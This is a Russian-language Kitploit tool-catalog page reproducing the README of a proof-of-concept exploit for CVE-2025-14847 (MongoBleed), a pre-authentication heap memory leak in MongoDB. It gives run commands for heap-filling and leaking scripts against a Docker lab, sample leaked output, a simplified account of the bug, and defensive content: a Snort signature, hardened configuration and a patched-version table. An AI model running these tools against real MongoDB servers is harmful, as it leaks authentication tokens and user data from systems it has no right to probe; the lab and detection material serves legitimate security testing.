Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-14857-MongoBleed — Функциональный proof-of-concept эксплойт для CVE-2025-14847 (MongoBleed), уязвимость раскрытия памяти кучи до аутентификации в MongoDB. Включает автоматическое обнаружение утечек памяти, анализ шаблонов и лабораторную среду на основе Docker для авторизованного тестирования безопасности и исследований. | Kitploit
Инструменты/GitHubGitHub/ermensonx/cve-2025-14857-mongobleed
Криминалистика памятиАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеБезопасность Баз Данных
GitHubermensonx/cve-2025-14857-mongobleed

CVE-2025-14857-MongoBleed

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Функциональный proof-of-concept эксплойт для CVE-2025-14847 (MongoBleed), уязвимость раскрытия памяти кучи до аутентификации в MongoDB. Включает автоматическое обнаружение утечек памяти, анализ шаблонов и лабораторную среду на основе Docker для авторизованного тестирования безопасности и исследований.

7 месяцев назадЕщё не проверено
Поделиться

CVE-2025-14847 (MongoBleed) - Рабочий PoC

Эксплуатация утечки памяти в MongoDB - Симулированная атака R6

CVE MongoDB Status Успешность

Полноценное доказательство концепции для CVE-2025-14847 (MongoBleed)
Протестировано: ✅ MongoDB 7.0.5 | 14 300+ успешных эксплойтов | 4 утёкших UUID


🎯 О проекте

Этот репозиторий содержит полностью рабочее доказательство концепции (PoC) для уязвимости CVE-2025-14847, известной как MongoBleed — критическая ошибка раскрытия памяти кучи до аутентификации в MongoDB.

Контекст: Инцидент с Rainbow Six Siege

В декабре 2025 года игра Rainbow Six Siege подверглась массовой атаке, в результате которой были скомпрометированы ~50 000 аккаунтов игроков. Предполагается, что злоумышленники использовали эту уязвимость в MongoDB бэкенда для утечки:

  • 🔑 Серверных токенов аутентификации (R6S_SERVER_AUTH_*)
  • 👤 UUID игроков и ID сессий
  • 🛡️ Флагов административных привилегий (TOURNAMENT_ADMIN, DEV_BUILD_WHITELIST)

Данный PoC симулирует атаку с реалистичными данными R6.


🔥 Возможности

  • ✅ 100% работоспособный эксплойт против MongoDB 7.0.5
  • ✅ 3 инструмента для эксплуатации:
    • poc.py — основной эксплойт с анализом шаблонов
    • live_leaker.py — продвинутое инкрементальное сканирование
    • popular_heap.py — скрипт для заполнения кучи целевыми данными
  • ✅ Полное Docker-окружение с уязвимым MongoDB
  • ✅ 1500+ симулированных документов бэкенда R6
  • ✅ Автоматическое обнаружение 10 чувствительных шаблонов (JWT, токены, UUID, IP)
  • ✅ Структурированные JSON-отчёты
  • ✅ Полная техническая документация (200+ страниц)

📊 Подтверждённые результаты

Извлечённые UUID (реальное доказательство)

root@kitploit:~
246434ed-759b-4ce9-bb9c-2f520a9919b8
980ab3a7-0230-4718-aa2d-fb28feafd7f5
1052a310-4cdc-492f-9890-465d76baba9b
f20debfa-298d-48e3-b3b9-9a0e037c0fbd

🚀 Быстрый старт

Предварительные требования

  • Docker и Docker Compose
  • Python 3.8+

Установка

root@kitploit:~
# Клонируйте репозиторий
git clone CVE-2025-14857-MongoBleed.git
cd MongoDBPoc

# Запустите уязвимое окружение
docker-compose up -d

# Дождитесь инициализации (15-20 сек)
docker logs cve-2025-14847-lab | grep "R6 MASSIVE"

Базовое использование

root@kitploit:~
# 1. Заполните кучу данными R6
python3 popular_heap.py 50

# 2. Проверьте уязвимость
python3 poc.py --target 127.0.0.1 --check

# 3. Эксплуатируйте с live leaker (РЕКОМЕНДУЕТСЯ)
timeout 30 python3 live_leaker.py --host 127.0.0.1 --min 200 --max 3000 --save results.json

Ожидаемый вывод

root@kitploit:~
[!] MongoBleed Live Leaker Avançado
[!] Alvo: 127.0.0.1:27017
[!] Faixa: doc_len 200 → 3000 (offset=500)

[*] Progresso: doc_len=245/3000 | Tentativas=100 | Taxa sucesso=100.0%

[!] PADRÕES R6 DETECTADOS (doc_len=245):
    [UUID] 1 novo(s):
      └─ 246434ed-759b-4ce9-bb9c-2f520a9919b8

🔬 Как это работает

Механизм уязвимости

MongoDB поддерживает сжатие сообщений через zlib. Уязвимость заключается в некорректной проверке заявленного размера по сравнению с реальным:

root@kitploit:~
Атакующий → {compress: "zlib", uncompressedSize: 1MB, payload: <50 байт>}
          ↓
Сервер выделяет 1MB кучи  ← УЯЗВИМОСТЬ
          ↓
Сервер распаковывает только 50 байт
          ↓
Сервер возвращает целый 1MB!
          └─ 50 байт = реальные данные
          └─ ~1MB - 50 = УТЕЧКА ПАМЯТИ

Уязвимый код (упрощённо)

root@kitploit:~
// ДО ПАТЧА
size_t uncompressedSize = header.uncompressedSize;  // ← Контролируется атакующим
buffer = malloc(uncompressedSize);                  // ← Выделяет вредоносный размер
zlib_decompress(compressed, buffer);
send(buffer, uncompressedSize);                     // ← УТЕЧКА ВСЕГО БУФЕРА

📂 Структура проекта

root@kitploit:~
MongoDBPoc/
├── poc.py                          # Основной эксплойт
├── live_leaker.py                  # Инкрементальное сканирование (✨ Рекомендуется)
├── popular_heap.py                 # Скрипт загрузки
├── docker-compose.yml              # Уязвимый MongoDB 7.0.5
├── init-db.js                      # 1000 игроков + 500 сессий R6
├── GUIA_TECNICO_COMPLETO.md        # Подробная документация (200+ страниц)
├── README.MD                       # Документация на английском
└── Portugues/                      # Переведённые версии
    ├── poc_PT.py
    ├── README_PT.md
    └── GUIA_RAPIDO.md

🛡️ Затронутые версии


🛡️ Обнаружение и защита

Сигнатура Snort

root@kitploit:~
alert tcp any any -> any 27017 (
    msg:"CVE-2025-14847 MongoBleed Attempt";
    content:"|d4 07 00 00|";
    byte_test:4,>,1000000,4,little;
    sid:2025001;
)

Безопасная конфигурация (mongod.conf)

root@kitploit:~
net:
  bindIp: 127.0.0.1              # НИКОГДА 0.0.0.0!
  compression:
    compressors: []              # Отключить zlib

security:
  authorization: enabled

Приоритеты смягчения

  1. 🔴 КРИТИЧЕСКИЙ: Обновление до исправленной версии
  2. 🟠 ВЫСОКИЙ: Отключить сжатие zlib
  3. 🟠 ВЫСОКИЙ: Сегментация сети (межсетевой экран)
  4. 🟡 СРЕДНИЙ: Включить аутентификацию

📚 Документация

  • GUIA_TECNICO_COMPLETO.md — полный технический анализ (200+ страниц)

    • Контекст инцидента R6
    • Механизм уязвимости
    • Уязвимый vs. исправленный код
    • Пошаговое выполнение
    • Результаты и статистика
    • IDS-сигнатуры и усиление защиты
  • README.MD — основная документация (английский)

  • Portugues/ — переведённые версии


⚠️ Правовое предупреждение

root@kitploit:~
ДАННЫЙ ИНСТРУМЕНТ ПРЕДНАЗНАЧЕН ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ И ОБУЧЕНИЯ.

Неавторизованное использование НЕЗАКОННО и может повлечь:
- Уголовное преследование (Закон 12.737/2012 в Бразилии)
- Крупные штрафы
- Тюремное заключение

Всегда получайте ПИСЬМЕННОЕ РАЗРЕШЕНИЕ перед тестированием.

Разрешённое использование

  • ✅ Тесты на проникновение с письменного разрешения
  • ✅ Академические исследования в изолированных средах
  • ✅ Проверка патчей от поставщиков
  • ✅ Обучение команд безопасности

Запрещённое использование

  • ❌ Сканирование или атака на системы без разрешения
  • ❌ Доступ к производственным базам данных
  • ❌ Продажа или превращение этого кода в оружие

🙏 Благодарности

Автор: Ermenson Jr
Лицензия: MIT (Образовательное использование)
Дата: Январь 2026

Ссылки

  • Рекомендация по безопасности MongoDB
  • CVE-2025-14847 NVD
  • Akamai SIRT: Анализ MongoBleed
  • Aikido Security

📧 Контакты

По техническим вопросам или для сотрудничества в области исследований безопасности:

  • GitHub Issues: Используйте вкладку Issues этого репозитория
  • Академический email: Доступен в профиле GitHub

🌟 Если этот проект оказался полезным

  • ⭐ Поставьте звезду этому репозиторию
  • 🔄 Поделитесь с сообществом безопасности
  • 📝 Цитируйте в своих академических исследованиях
  • 🐛 Сообщайте об ошибках или улучшениях через Issues

Разработано для исследования ответственной наступательной безопасности.
Не аффилировано с Ubisoft, MongoDB Inc. или Rainbow Six Siege.

🔒 Используйте ответственно. Безопасность для всех. 🔒

Скачать инструмент
МетрикаРезультат
Протестированная MongoDB7.0.5 (Уязвимая)
Успешность100% (14 300/14 300 запросов)
Утёкшие UUID4 уникальных
Всего утечек33 различные строки
Максимальная утечка176 байт/запрос
Обнаруженные шаблоныСетевые логи, UUID, системные пути
Серия MongoDBУязвимые версииИсправленная версия
8.2.x8.2.0 – 8.2.28.2.3
8.0.x8.0.0 – 8.0.168.0.17
7.0.x7.0.0 – 7.0.277.0.28
6.0.x6.0.0 – 6.0.266.0.27
5.0.x5.0.0 – 5.0.315.0.32
4.4.x4.4.0 – 4.4.294.4.30
≤ 4.2ВсеНет патча (EOL)